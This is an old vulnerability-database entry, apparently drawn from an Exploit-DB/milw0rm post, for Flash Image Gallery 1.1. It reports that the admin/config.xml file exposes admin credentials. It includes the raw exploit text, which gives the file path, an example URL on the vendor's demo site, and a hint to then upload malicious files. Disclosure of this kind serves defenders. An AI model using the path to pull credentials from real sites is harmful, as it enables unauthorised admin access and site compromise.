Flash Image Gallery 1.1 Sensitive Data Disclosure

vendor:

Flash Image Gallery

by:

DarkbiteX

7,5

CVSS

HIGH

Sensitive Data Disclosure

200

CWE

Product Name: Flash Image Gallery

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:flashimagegallery:flash_image_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Flash Image Gallery 1.1 Sensitive Data Disclosure

The vulnerability exists in the Flash Image Gallery 1.1 and maybe last version. An attacker can access the config.xml file which contains the admin username and password. The attacker can then use this information to gain access to the admin panel and upload malicious files.

Mitigation:

Restrict access to the config.xml file and ensure that the admin panel is password protected.

Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX
Greets:        : |OverclockiX| , |0o_Zeuz_o0|, |Status-X|, |Fatal Inside|, |NaOnack|, |Good-Spide|, |All Moroccan Hackers|

########################################################################################
Bug:[Sensitive Data Disclosure]
########################################################################################

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                
                 Use Of The Imagination and UPLOAD your archive ;) 
#########################################################################################

# milw0rm.com [2009-05-26]